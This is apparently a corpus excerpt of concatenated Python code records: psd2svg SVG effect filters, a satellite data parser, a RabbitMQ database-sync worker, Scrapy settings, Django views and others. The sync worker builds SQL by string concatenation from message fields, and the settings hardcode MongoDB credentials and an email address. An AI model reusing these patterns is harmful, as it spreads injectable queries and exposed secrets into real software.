transfer.feFuncA('linear', slope=255, intercept=0)\n filt.feComposite('irglFlood', in2='irglAlpha', operator='out',\n result='irglShadow')\n filt.feMorphology('irglShadow', radius=blur * spread,\n operator='dilate', result='irglDilate')\n filt.feGaussianBlur('irglDilate', stdDeviation=blur * (1 - spread),\n result='irglBlur')\n filt.feComposite('irglBlur', in2='irglAlpha', operator='in',\n result='irglShadow')\n\n target = self._dwg.use(target_iri, filter=filt.get_funciri())\n target['class'] = 'layer-effect inner-glow'\n if not blend_mode:\n blend_mode = BLEND_MODE2.get(items[b'Md '].value, 'normal')\n if blend_mode != 'normal':\n target['style'] = 'mix-blend-mode: {}'.format(blend_mode)\n return target\n\n def _add_frfx(self, items, target_iri):\n radius = int(items[b'Sz '].value)\n style = items[b'Styl'].value\n\n filt = self._dwg.defs.add(self._dwg.filter())\n filt['class'] = 'stroke'\n\n flood = filt.feFlood(result='frfxFlood')\n # TODO: Gradient or pattern fill\n flood['flood-color'] = self._get_color_in_item(items)\n flood['flood-opacity'] = items[b'Opct'].value / 100.0\n if style == b'OutF':\n filt.feMorphology('SourceAlpha', result='frfxMorph',\n operator='dilate', radius=radius)\n filt.feComposite('frfxFlood', in2='frfxMorph', operator='in',\n result='frfxBoundary')\n filt.feComposite('frfxBoundary', in2='SourceAlpha',\n operator='out')\n elif style == b'InsF':\n filt.feMorphology('SourceAlpha', result='frfxMorph',\n operator='erode', radius=radius)\n filt.feComposite('frfxFlood', in2='frfxMorph', operator='out',\n result='frfxBoundary')\n filt.feComposite('frfxBoundary', in2='SourceAlpha',\n operator='in')\n else:\n filt.feMorphology('SourceAlpha', result='frfxDilate',\n operator='dilate', radius=radius / 2.0)\n filt.feMorphology('SourceAlpha', result='frfxErode',\n operator='erode', radius=radius / 2.0)\n filt.feComposite('frfxDilate', in2='frfxErode', operator='out',\n result='frfxMorph')\n filt.feComposite('frfxFlood', in2='frfxMorph', operator='in')\n\n target = self._dwg.use(target_iri, filter=filt.get_funciri())\n target['class'] = 'layer-effect stroke'\n blend_mode = BLEND_MODE2.get(items[b'Md '].value, 'normal')\n if blend_mode != 'normal':\n target['style'] = 'mix-blend-mode: {}'.format(blend_mode)\n return target\n\n def _get_color_in_item(self, items, scale=1):\n # TODO: Color space support other than RGB.\n if b'Clr ' in items:\n color = items[b'Clr ']\n if color.classID == b'Grsc':\n luminosity = (100.0 - color.items[0][1].value) / 100.0\n return 'rgb({0},{0},{0})'.format(int(255 * luminosity))\n elif color.classID == b'RGBC':\n color_items = dict(color.items)\n # b'Nm ', b'bookID', b'bookKey' fields can exist.\n return 'rgb({},{},{})'.format(\n int(color_items[b'Rd '].value),\n int(color_items[b'Grn '].value),\n int(color_items[b'Bl '].value))\n elif color.classID == b'CMYC':\n color_items = dict(color.items)\n cmyk = (color_items[b'Cyn '].value,\n color_items[b'Mgnt'].value,\n color_items[b'Ylw '].value,\n color_items[b'Blck'].value)\n rgb = cmyk2rgb(cmyk)\n return 'rgb({},{},{})'.format(*map(int, rgb))\n else:\n logger.error('Unsupported color: {}'.format(color.classID))\n raise NotImplementedError\n elif b'Grad' in items:\n logger.warning('Unsupported gradient fill')\n grad = dict(items[b'Grad'].items)\n if b'Clrs' in grad:\n colors = grad[b'Clrs'].items\n colors = [tuple(int(c[1].value / scale)\n for c in dict(clr.items)[b'Clr '].items)\n for clr in colors]\n return 'rgb({},{},{})'.format(*colors[0])\n else:\n return 'rgb(255,255,255)' # TODO: Get grad reference.\n else:\n logger.error('Unknown color in items: {}'.format(items.keys()))\n raise NotImplementedError\n\n def _get_fill(self, layer):\n blocks = layer._tagged_blocks\n if b'PtFl' in blocks: # TODO implement\n logger.warning('Unsupported pattern fill')\n return 'none'\n for key in TaggedBlock._FILL_KEYS:\n if key in blocks:\n items = dict(blocks[key].data.items)\n return self._get_color_in_item(items)\n return 'none'\n\n def _make_pattern(self, items, insert=(0, 0)):\n pattern_id = dict(items[b'Ptrn'].items)[b'Idnt'].value\n patt = self._psd.patterns.get(pattern_id, None)\n if not patt:\n logger.warning('Pattern data not found')\n return patt\n\n pattern = self._dwg.defs.add(svgwrite.pattern.Pattern())\n pattern['width'] = patt.width\n pattern['height'] = patt.height\n pattern['patternUnits'] = 'userSpaceOnUse'\n pattern['patternContentUnits'] = 'userSpaceOnUse'\n\n align = items[b'Algn'].value\n phase = dict(items[b'phase'].items)\n phase = (phase[b'Hrzn'].value, phase[b'Vrtc'].value)\n scale = items[b'Scl '].value\n pattern['patternTransform'] = 'translate({},{}) scale({})'.format(\n insert[0] + phase[0], insert[1] + phase[1], scale / 100.0)\n pattern.add(self._dwg.image(\n self._get_image_href(patt.as_PIL()), insert=(0, 0),\n size=(patt.width, patt.height)))\n return pattern\n\n def _make_gradient(self, items, size):\n if items[b'Type'].value == b'Rdl ':\n grad = self._dwg.defs.add(svgwrite.gradients.RadialGradient(\n center=None, r=.5))\n else:\n theta = np.radians(-items[b'Angl'].value)\n start = np.array([size[0] * np.cos(theta - np.pi),\n size[1] * np.sin(theta - np.pi)])\n end = np.array([size[0] * np.cos(theta), size[1] * np.sin(theta)])\n r = 1.0 * np.max(np.abs(start))\n start = start / (2 * r) + 0.5\n end = end / (2 * r) + 0.5\n\n start = [np.around(x, decimals=6) for x in start]\n end = [np.around(x, decimals=6) for x in end]\n\n grad = self._dwg.defs.add(svgwrite.gradients.LinearGradient(\n start=start, end=end))\n\n grad_items = dict(items[b'Grad'].items)\n if b'Clrs' not in grad_items:\n logger.warning('Unsupported gradient type')\n return grad\n color_list = [dict(v.items) for v in grad_items[b'Clrs'].items]\n opacity_list = [dict(v.items) for v in grad_items[b'Trns'].items]\n\n # Interpolate color and opacity for both points.\n cp = np.array([x[b'Lctn'].value / 4096 for x in color_list])\n op = np.array([x[b'Lctn'].value / 4096 for x in opacity_list])\n c_items = np.array([[y[1].value for y in x[b'Clr '].items] for x\n in color_list]).transpose()\n o_items = np.array([x[b'Opct'].value / 100.0 for x in opacity_list])\n\n # Remove duplicate points.\n index = np.concatenate((np.diff(cp) > 0, [True]))\n if np.any(np.logical_not(index)):\n logger.warning('Duplicate gradient color stop: {}'.format(cp))\n cp = cp[index]\n c_items = c_items[:, index]\n index = np.concatenate((np.diff(op) > 0, [True]))\n if np.any(np.logical_not(index)):\n logger.warning('Duplicate gradient opacity stop: {}'.format(op))\n op = op[index]\n o_items = o_items[index]\n\n # Single point handling.\n if len(cp) < 2:\n cp = np.array([0.0, 1.0])\n c_items = np.concatenate((c_items, c_items), axis=1)\n if len(op) < 2:\n op = np.array([0.0, 1.0])\n o_items = np.array(list(o_items) + list(o_items))\n\n # Reverse if specified.\n if items[b'Rvrs'].value:\n cp = 1.0 - cp[::-1]\n op = 1.0 - op[::-1]\n c_items = c_items[:, ::-1]\n o_items = o_items[::-1]\n\n mp = np.unique(np.concatenate((cp, op)))\n fc = np.stack(\n [np.interp(mp, cp, c_items[index, :]) for index in range(3)])\n fo = np.interp(mp, op, o_items)\n\n for index in range(len(mp)):\n color = tuple(fc[:, index].astype(np.uint8).tolist())\n grad.add_stop_color(\n offset=mp[index], opacity=fo[index],\n color='rgb{}'.format(color))\n return grad\n\n def _get_white_filter(self, color='white'):\n if not self._white_filter:\n self._white_filter = self._dwg.defs.add(self._dwg.filter())\n self._white_filter['class'] = 'white-filter'\n if color == 'white':\n self._white_filter.feColorMatrix(\n 'SourceAlpha', type='matrix',\n values=\"0 0 0 0 1 0 0 0 0 1 0 0 0 0 1 0 0 0 1 0\")\n else:\n self._white_filter.feColorMatrix(\n 'SourceAlpha', type='matrix',\n values=\"0 0 0 1 0 0 0 0 1 0 0 0 0 1 0 0 0 0 1 0\")\n return self._white_filter\n\n def _get_identity_filter(self):\n if not self._identity_filter:\n self._identity_filter = self._dwg.defs.add(self._dwg.filter())\n self._identity_filter['class'] = 'identify-filter'\n transfer = self._identity_filter.feComponentTransfer(\n 'SourceGraphic')\n transfer['color-interpolation'] = 'sRGB'\n transfer.feFuncR('identity')\n transfer.feFuncG('identity')\n transfer.feFuncB('identity')\n transfer.feFuncA('identity')\n return self._identity_filter\n","sub_path":"src/psd2svg/converter/effects.py","file_name":"effects.py","file_ext":"py","file_size_in_byte":22034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"188500063","text":"import tempfile\nimport os\nimport uuid\n\n\nclass File:\n def __init__(self, file_adress):\n self.file_adress = file_adress\n\n def write(self, line):\n with open(self.file_adress, \"w\") as f:\n f.write(line)\n\n def read(self):\n with open(self.file_adress, \"r\") as f:\n return f.read()\n\n def __add__(self, obj): # DODELAT\n newfile = os.path.join(tempfile.gettempdir(), \"file_\" + str(uuid.uuid1()) + \".txt\")\n with open(self.file_adress, \"r\") as x:\n with open(obj.file_adress, \"r\") as y:\n with open(newfile, \"a\") as f:\n f.write(x.read())\n f.write(y.read())\n return File(newfile)\n\n def __iter__(self):\n with open(self.file_adress, \"r\") as f:\n lines = f.readlines()\n return iter(lines)\n\n def __str__(self):\n return self.file_adress\n\n\ndef _test():\n a = File(\"1.txt\")\n b = File(\"2.txt\")\n d = File(\"3.txt\")\n c = a + b\n print(c)\n x = c + d\n print(x)\n for line in x:\n print(line)\n\n a.write(\"azaza\")\n print(a.read())\n\n\nif __name__ == \"__main__\":\n _test()\n","sub_path":"dive-in-python/4.fail-s-magicheskimi-metodami.py","file_name":"4.fail-s-magicheskimi-metodami.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"589120694","text":"import abc\nimport datetime\nimport itertools\nimport os\nimport time\n\nimport numpy as np\nfrom spacepy import datamodel as dm\n\nimport packet\nimport page\n\ndef hex2int(inpage):\n \"\"\"\n convert a page of ascii hex data to integrers and None as needed\n \"\"\"\n dat = []\n for v in inpage:\n try:\n dat.append(int(v, 16))\n except TypeError:\n dat.append(None)\n return dat\n\ndef dat2time(inval):\n \"\"\"\n take 8 bytes and change them to a datetime\n \"\"\"\n t0 = datetime.datetime(2000 + inval[0], inval[1], inval[2],\n inval[3], inval[4], inval[5],\n 1000*(inval[6]*(2**8) + inval[7]))\n return t0\n\ndef validDate(inval, mindate=datetime.datetime(2013, 12, 1), maxdate=datetime.datetime(2015, 12, 31)):\n \"\"\"\n go through input data and if it makes a date in the given rage it is valid, otherwise it is not\n \"\"\"\n try:\n inval = [int(v, 16) for v in inval]\n except TypeError:\n return False\n try:\n date = dat2time(inval)\n if date >= mindate and date <= maxdate:\n return True\n else:\n return False\n except (ValueError, TypeError):\n return False\n\n ## if isinstance(inval, str) and len(inval) > 2:\n ## t0tmp = inval.split()\n ## t1tmp = [int(v, 16) for v in t0tmp[0:6]]\n ## t1tmp.append(int(t0tmp[6]+t0tmp[7], 16))\n ## t0 = datetime.datetime(2000 + t1tmp[0], t1tmp[1], t1tmp[2],\n ## t1tmp[3], t1tmp[4], t1tmp[5], 1000*t1tmp[6])\n ## else:\n ## try:\n ## t1tmp = [int(v, 16) for v in inval[0:6]]\n ## except TypeError:\n ## t1tmp = inval[0:6]\n ## try:\n ## t1tmp.append(int(inval[6]+inval[7], 16))\n ## except TypeError:\n ## t1tmp.append(2**8*inval[6] + inval[7])\n ## try:\n ## t0 = datetime.datetime(2000 + t1tmp[0], t1tmp[1], t1tmp[2],\n ## t1tmp[3], t1tmp[4], t1tmp[5], 1000*t1tmp[6])\n ## except ValueError:\n ## return None\n ## return t0\n\nclass data(object):\n __metaclass__ = abc.ABCMeta\n \"\"\"\n just a few methods common to all the data type classes below\n \"\"\"\n def write(self, filename, hdf5=False):\n if hdf5:\n dm.toHDF5(filename, self.data)\n else:\n dm.toJSONheadedASCII(filename, self.data, order=['Epoch'] )\n print(' Wrote {0}'.format(os.path.abspath(filename)))\n\n @classmethod\n @abc.abstractmethod\n def read(self, filename):\n \"\"\"read in the data from the file\"\"\"\n b = packet.BIRDpackets(filename)\n print(' Read {0} packets'.format(len(b)))\n pages = page.page.fromPackets(b)\n print(' Read {0} pages'.format(len(pages)))\n return pages\n \nclass dataPage(list):\n __metaclass__ = abc.ABCMeta\n\n @abc.abstractmethod\n def major_data(self, inval):\n \"\"\"Method the decodes data with a major time stamp\"\"\"\n return\n\n @abc.abstractmethod\n def minor_data(self, inval):\n \"\"\"Method the decodes data with a minor time stamp\"\"\"\n return\n\n\n","sub_path":"L0toL1/FIREdata.py","file_name":"FIREdata.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"397104565","text":"import pika\nfrom database import execute, fetchone, fetchall\nimport json\n\ndef do_synchronize(ch,method,properties,body):\n #sync local dbase for eventual consistency\n action = json.loads(body)['request'] #deserialize the body\n print(\"SYNCHRO RECEIVED\")\n print(action)\n if (action['query'] == \"clear\"):\n db_clear()\n else:\n CONDITION = None\n VALUES = None\n QUERY = action[\"query\"]\n TABLE = action[\"table\"]\n if (\"condition\" in action):\n CONDITION = action[\"condition\"]\n if (\"values\" in action):\n VALUES = action[\"values\"]\n db_write(QUERY,TABLE,VALUES,CONDITION)\n\n ch.basic_ack(delivery_tag=method.delivery_tag) #Acknowledge the message\n\ndef db_clear():\n tables = [\"rides\", \"riders\", \"users\"]\n for table in tables:\n delete_query = '''\n DELETE FROM ''' + table\n execute(delete_query)\n query = '''UPDATE APICOUNT SET COUNT=0'''\n execute(query)\n return {}, 200\n\ndef db_write(query,table,values=None,condition=None):\n query = query\n table = table\n if query == 'insert':\n if values:\n #values = values\n insert_query = '''\n INSERT INTO ''' + table + '(' + ','.join(values.keys()) + ') ' + '''\n VALUES ''' + '(' + ','.join(map(repr, values.values())) + ')'\n if execute(insert_query):\n return 200\n return 400\n elif query == 'delete':\n if condition:\n delete_query = '''\n DELETE FROM ''' + table + '''\n WHERE ''' + ' AND '.join(map(lambda x, y: x + '=' + repr(y), condition.keys(), condition.values()))\n execute(delete_query)\n return 200\n return 400\n elif query == 'update':\n if condition:\n update_query = '''\n UPDATE ''' + table + ''' \n SET ''' + ','.join(map(lambda x, y: x + ' = ' + y, values.keys(), values.values())) + ''' \n WHERE ''' + ' AND '.join(map(lambda x, y: x + '=' + repr(y), condition.keys(), condition.values()))\n execute(update_query)\n return 200\n return 400\n\nconnection = pika.BlockingConnection(pika.ConnectionParameters(host='bunny'))\nsync_channel = connection.channel()\nr = sync_channel.queue_declare(\"\",exclusive=True)\nsync_channel.exchange_declare(exchange = \"syncQ\",exchange_type='fanout') #fanout exchange to allow multiple consumers to receive the message simultaneously\nsync_channel.queue_bind(exchange='syncQ',queue=r.method.queue,routing_key='')\nsync_channel.basic_consume(queue = r.method.queue, on_message_callback = do_synchronize)\nprint(\"SYNCHRO\")\nsync_channel.start_consuming()\n","sub_path":"Project-DBaaS/dbaas/worker/synchro.py","file_name":"synchro.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"464982533","text":"# -*- coding: utf-8 -*-\n\n# Scrapy settings for srppro project\n#\n# For simplicity, this file contains only settings considered important or\n# commonly used. You can find more settings consulting the documentation:\n#\n# https://doc.scrapy.org/en/latest/topics/settings.html\n# https://doc.scrapy.org/en/latest/topics/downloader-middleware.html\n# https://doc.scrapy.org/en/latest/topics/spider-middleware.html\n\nBOT_NAME = 'srppro'\n\nSPIDER_MODULES = ['srppro.spiders']\nNEWSPIDER_MODULE = 'srppro.spiders'\n\n\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\n#USER_AGENT = 'srppro (+http://www.yourdomain.com)'\n\n# Obey robots.txt rules\n# 不遵循robots.txt的规范,如可以抓取网站中不允许的页面\nROBOTSTXT_OBEY = False\n\n# Configure maximum concurrent requests performed by Scrapy (default: 16)\n# 并发request请求数量\n#CONCURRENT_REQUESTS = 32\n\n# Configure a delay for requests for the same website (default: 0)\n# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay\n# See also autothrottle settings and docs\n# 延时并不是精确的,因为精确的请求同样会被反爬虫检测到,\n# 所以在每个延时中间添加随机的偏移量\n# 也可以单独设置某个spider的download_delay属性\nDOWNLOAD_DELAY = 1\n# The download delay setting will honor only one of:\n# 同一时刻对同一domain发起的请求数\nCONCURRENT_REQUESTS_PER_DOMAIN = 1\n#CONCURRENT_REQUESTS_PER_IP = 16\n\n# Disable cookies (enabled by default)\n# 除非必要,不然禁用cookie,其会消耗cpu\nCOOKIES_ENABLED = False\n# 显示发送的cookie及接收的cookie\nCOOKIES_DEBUG = False\n\n# 日志级别\nLOG_LEVEL = 'DEBUG'\n\n# Disable Telnet Console (enabled by default)\nTELNETCONSOLE_ENABLED = True\n\n# telnet配置\nTELNETCONSOLE_PORT = [6023, 6073]\nTELNETCONSOLE_HOST = '127.0.0.1'\n\n# Override the default request headers:\n# 默认请求头\n#DEFAULT_REQUEST_HEADERS = {\n# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n# 'Accept-Language': 'en',\n#}\n\n# Enable or disable spider middlewares\n# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html\n#SPIDER_MIDDLEWARES = {\n# 'srppro.middlewares.SrpproSpiderMiddleware': 543,\n#}\n\n# Enable or disable downloader middlewares\n# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html\n#DOWNLOADER_MIDDLEWARES = {\n# 'srppro.middlewares.SrpproDownloaderMiddleware': 543,\n#}\n\n# None为不启用,有些中间件会默认开启,可以在这里指定禁用\n# 中间件可能都会处理request与response,所以处理顺序是很重要的\nDOWNLOADER_MIDDLEWARES = {\n #'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': 127,\n 'srppro.middlewares.UAPOOLS': 128,\n #'srppro.middlewares.ProxyMiddleware': 129,\n}\n\n# Enable or disable extensions\n# See https://doc.scrapy.org/en/latest/topics/extensions.html\n# 通用扩展,其他通用扩展还有logstats基本统计信息扩展,发送邮件,内存调试扩展等,\n# None不启用,但扩展可能也会受到其他设置的影响,导致扩展不生效\n# 如以下TelnetConsole扩展依赖TELNETCONSOLE_ENABLED\n# 有些扩展如果依赖项设置了,则会默认开启\n# 扩展在scrapy启动时被初始化\nEXTENSIONS = {\n #'scrapy.extensions.telnet.TelnetConsole': 1,\n #'scrapy.extensions.closespider.CloseSpider': 1,\n #'scrapy.extensions.statsmailer.StatsMailer': 1,\n #'srppro.extensions.RedisSpiderSmartIdleClosedExensions':1,\n}\n\n# Configure item pipelines\n# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n#ITEM_PIPELINES = {\n# 'srppro.pipelines.SrpproPipeline': 300,\n#}\n\nITEM_PIPELINES = {\n #'srppro.pipelines.SrpproPipeline': 300,\n 'srppro.pipelines.MongoPipeline': 301,\n #'srppro.pipelines.CSDNImagesPipeline': 302,\n # 使用redis存储,数据量大的时候不建议使用redis存储\n # redis基于内存,常用与存取频繁访问的数据\n #'scrapy_redis.pipelines.RedisPipeline': 303,\n #'srppro.pipelines.XmlExportPipeline': 304,\n #'srppro.pipelines.JsonLineExportPipeline': 305,\n}\n\nSPIDER_CONTRACTS = {\n 'srppro.contracts.HeaderCheck':10,\n}\n\n# Enable and configure the AutoThrottle extension (disabled by default)\n# See https://doc.scrapy.org/en/latest/topics/autothrottle.html\n# 根据爬取的网站的负载自动限制爬取速度。\n#AUTOTHROTTLE_ENABLED = True\n# The initial download delay\n#AUTOTHROTTLE_START_DELAY = 5\n# The maximum download delay to be set in case of high latencies\n#AUTOTHROTTLE_MAX_DELAY = 60\n# The average number of requests Scrapy should be sending in parallel to\n# each remote server\n#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0\n# Enable showing throttling stats for every response received:\n#AUTOTHROTTLE_DEBUG = True\n\n# Enable and configure HTTP caching (disabled by default)\n# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings\n#HTTPCACHE_ENABLED = True\n#HTTPCACHE_EXPIRATION_SECS = 0\nHTTPCACHE_DIR = 'myfile/httpcache'\n# 在缓存中没找到的也不会从网络中下载\n#HTTPCACHE_IGNORE_MISSING = True\n# 不缓存这些scheme的response\n#HTTPCACHE_IGNORE_SCHEMES = ['file', 'https']\n# reponse中有如下返回值的不缓存\n#HTTPCACHE_IGNORE_HTTP_CODES = [500]\n# http缓存放入本地文件中\n#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'\n# http缓存存入DBM中\nHTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.DbmCacheStorage'\n# 使用Dummy缓存策略,每次都从缓存读取\nHTTPCACHE_POLICY = 'scrapy.extensions.httpcache.DummyPolicy'\n# 使用Dummy缓存策略,根据响应头数据设置缓存\n#HTTPCACHE_POLICY = 'scrapy.extensions.httpcache.RFC2616Policy'\n# 是否进行缓存压缩\n#COMPRESSION_ENABLED = True\n\n# mongodb数据库\nMONGO_URI = 'mongodb://tbq:tbq@192.168.1.102:27017'\nMONGO_DATABASE = 'CSDN'\n\n# 图片参数\nIMAGES_STORE = \"myfile/image\"\nIMAGES_EXPIRES = 2\n# 缩略尺寸\nIMAGES_THUMBS = {\n 'small':(50, 50),\n 'big':(250, 250),\n}\n# 根据大小限制图片下载\nIMAGES_MIN_HEIGHT = 50\nIMAGES_MIN_WIDTH = 50\n\n# closespider扩展配置\n#CLOSESPIDER_ITEMCOUNT = 5\n# CLOSESPIDER_TIMEOUT = 30\n# CLOSESPIDER_PAGECOUNT = 5\n# CLOSESPIDER_ERRORCOUNT = 10\n\n# 邮件扩展配置\nSTATSMAILER_RCPTS = '1764740905@qq.com'\n\n# 发送邮件的服务器\nMAIL_HOST = 'smtp.qq.com'\n# 邮件发送者\nMAIL_FROM = '1764740905@qq.com'\n# 发送端口号\nMAIL_PORT = 25\n# 登录到stmp服务需要的验证信息\nMAIL_PASS = \"\"\nMAIL_USER = \"1764740905@qq.com\"\n\n# 网站连接广度优先爬取设定,默认是深度优先\n# DEPTH_PRIORITY = 1\n# SCHEDULER_DISK_QUEUE = 'scrapy.squeue.PickleFifoDiskQueue'\n# SCHEDULER_MEMORY_QUEUE = 'scrapy.squeue.FifoMemoryQueue'\n\n# 根据response返回码进行网页重定向,重定向会浪费一定时间\nREDIRECT_ENABLED = False\n# REDIRECT_MAX_TIMES = 5\n\n# 根据meta-refresh html标签重定向\nMETAREFRESH_MAXDELAY = 100\n\n# 在所有正常url被抓取完后对超时的url请求或者500错误的request进行重试\nRETRY_ENABLED = False\nRETRY_TIMES = 5\nRETRY_HTTP_CODES = [500, 502, 503, 504, 400, 408]\n\n# 根据meta-fragment html标签查找ajax可爬取页面的中间件\n# 一般为index或者main界面\nAJAXCRAWL_ENABLED = False\n\n# 下载超时\nDOWNLOAD_TIMEOUT = 20\n\n# # 使用scrapy_redis的调度队列,默认是使用scrapy自身的scheduler\n# # SCHEDULER = \"scrapy_redis.scheduler.Scheduler\"\n# # 去重\n# DUPEFILTER_CLASS = \"scrapy_redis.dupefilter.RFPDupeFilter\"\n\n# # 配置服务器地址及密码\n# REDIS_HOST = '127.0.0.1'\n# REDIS_PORT = 6379\n# REDIS_PARAMS = {\n# 'password':'123456'\n# }\n# REDIS_ENCODING = \"utf-8\"\n\n# # 优先级高于REDIS_HOST\n# REDIS_URL = 'redis://:pwd@localhost:6379'\n\n# # 去调度器中获取数据时,如果为空,最多等待时间\n# SCHEDULER_IDLE_BEFORE_CLOSE = 5\n# # 去重规则,在redis中保存时对应的key\n# SCHEDULER_DUPEFILTER_KEY = '%(spider)s:dupefilter'\n# # 调度器中请求存放在redis中的key chouti:requests \n# # SCHEDULER_QUEUE_KEY = '%(spider)s:requests'\n# # 对保存到redis中的数据进行序列化,默认使用pickle\n# SCHEDULER_SERIALIZER = 'scrapy_redis.picklecompat'\n# # 是否在关闭时候保留原来的调度器和去重记录,True=保留,False=清空\n# SCHEDULER_PERSIST = True\n# # 调度器中请求存放在redis中的key chouti:requests\n# #SCHEDULER_QUEUE_KEY = '%(spider)s:requests'\n# # 使用FIFO队列\n# SCHEDULER_QUEUE_CLASS = 'scrapy_redis.queue.SpiderQueue'\n# 使用优先级队列 by score\n# SCHEDULER_QUEUE_CLASS = 'scrapy_redis.queue.PriorityQueue'\n# 使用先进先出队列, lpush, rpop()\n# SCHEDULER_QUEUE_CLASS = 'scrapy_redis.queue.FifoQueue'\n# 使用后进先出队列 lpush lpop()\n# SCHEDULER_QUEUE_CLASS = 'scrapy_redis.queue.LifoQueue'\n# 爬取开始时清空爬取队列\n#SCHEDULER_FLUSH_ON_START\n\n# # 如果为True,则使用redis的'spop'进行操作,避免起始网址列表重复\n# REDIS_START_URLS_AS_SET = False\n\n# # 自定义判断队列是否为空的扩展\n# REDISEMPTY_EXT_ENABLED = True","sub_path":"python/PythonApplication/PythonApplication/gerapy/projects/srppro/srppro/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":9009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"176760196","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom article.models import Article, Images\nfrom post.forms import PostForm, UpdateForm\nfrom django.views.generic.edit import FormView\nfrom django.conf import settings\nfrom time import time\nfrom datetime import datetime\n\n# Create your views here.\n\ndef handle_uploaded_file(f, f_name):\n with open(f_name, 'wb+') as destination:\n for chunk in f.chunks():\n destination.write(chunk)\n\n\nclass PostView(LoginRequiredMixin, FormView):\n login_url = '/login/'\n redirect_field_name = 'next'\n form_class = PostForm\n template_name = 'post/post.html'\n f_pks = []\n\n def post(self, request, *args, **kwargs):\n form = self.get_form()\n files = request.FILES.getlist('images')\n if form.is_valid():\n if self.f_pks:\n self.f_pks = []\n for f in files:\n tag = str(time()).replace('.', '')\n name = f.name.split('.')[-1]\n f_name = settings.MEDIA_ROOT + '/img/' + tag + '.' + name\n f_url = settings.MEDIA_URL + 'img/' + tag + '.' + name\n handle_uploaded_file(f, f_name)\n image = Images.objects.create(image_url=f_url)\n self.f_pks.append(image.pk)\n return self.form_valid(request, form)\n else:\n return self.form_invalid(request, form)\n\n def form_valid(self, request, form):\n post_article = form.save(commit=False)\n post_article.save()\n title = form.cleaned_data['title']\n new_article = Article.objects.get(title=title)\n for f_pk in self.f_pks:\n url = Images.objects.get(pk=f_pk)\n new_article.image.add(url)\n self.success_url = new_article.get_absolute_url()\n return redirect(self.success_url)\n\n def form_invalid(self, form):\n return render(self.request, 'post/post.html', {'form': form})\n\n\nclass UpdateView(LoginRequiredMixin, FormView):\n login_url = '/login/'\n redirect_field_name = 'next'\n template_name = 'post/update.html'\n pk_url_kwarg = 'article_id'\n form_class = UpdateForm\n f_pks = []\n\n def post(self, request, *args, **kwargs):\n form = self.get_form()\n files = request.FILES.getlist('images')\n if form.is_valid():\n if self.f_pks:\n self.f_pks = []\n for f in files:\n tag = str(time()).replace('.', '')\n name = f.name.split('.')[-1]\n f_name = settings.MEDIA_ROOT + '/img/' + tag + '.' + name\n f_url = settings.MEDIA_URL + 'img/' + tag + '.' + name\n handle_uploaded_file(f, f_name)\n image = Images.objects.create(image_url=f_url)\n self.f_pks.append(image.pk)\n return self.form_valid(request, form)\n else:\n return self.form_invalid(request, form)\n\n def get_form(self, form_class=None):\n form_class = self.form_class\n pk = self.kwargs.get(self.pk_url_kwarg)\n update_article = Article.objects.get(pk=pk)\n return form_class(instance=update_article, **self.get_form_kwargs())\n\n def form_valid(self, request, form):\n pk = self.kwargs.get(self.pk_url_kwarg)\n form.save()\n article = Article.objects.get(pk=pk)\n last_modified_time = datetime.now()\n article.last_modified_time = last_modified_time\n article.save()\n for f_pk in self.f_pks:\n url = Images.objects.get(pk=f_pk)\n article.image.add(url)\n self.success_url = article.get_absolute_url()\n return redirect(self.success_url)\n\n def form_invalid(self, form):\n return render(self.request, 'post/update.html', {'form': form})\n","sub_path":"post/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"391225861","text":"from GUIDataModule import Component\nclass GUIBranch(Component.Component):\n fbusPosition = {}\n tbusPosition = {}\n def __init__(self,centerX,centerY,gid,fbusPositionX,fbusPositionY,tbusPositionX,tbusPositionY):\n super().__init__()\n self.fbusPosition = {}\n self.tbusPosition = {}\n self.init(centerX,centerY)\n self.referenceInstanceGid = gid\n self.name = \"Branch\"\n if tbusPositionX < fbusPositionX:\n self.fbusPosition[\"x\"] = tbusPositionX\n self.fbusPosition[\"y\"] = tbusPositionY\n self.tbusPosition[\"x\"] = fbusPositionX\n self.tbusPosition[\"y\"] = fbusPositionY\n else:\n self.fbusPosition[\"x\"] = fbusPositionX\n self.fbusPosition[\"y\"] = fbusPositionY\n self.tbusPosition[\"x\"] = tbusPositionX\n self.tbusPosition[\"y\"] = tbusPositionY","sub_path":"src/GUIDataModule/GUIBranch.py","file_name":"GUIBranch.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"333319374","text":"# Copyright (c) Facebook, Inc. and its affiliates.\n\nimport torch\nfrom mmf.common.registry import registry\nfrom mmf.models.pythia import Pythia\nfrom mmf.models.memo_net import MemoNet\nfrom mmf.modules.embeddings import (\n ImageFeatureEmbedding,\n MultiHeadImageFeatureEmbedding,\n PreExtractedEmbedding,\n TextEmbedding,\n)\nfrom mmf.modules.layers import MemNNLayer\n# from mmf.modules.layers import EdgeLayer\n# from mmf.modules.layers import NodeLayer\n# from mmf.modules.layers import GlobalLayer\n# from mmf.modules.layers import GraphMemoryLayer\nfrom mmf.modules.layers import 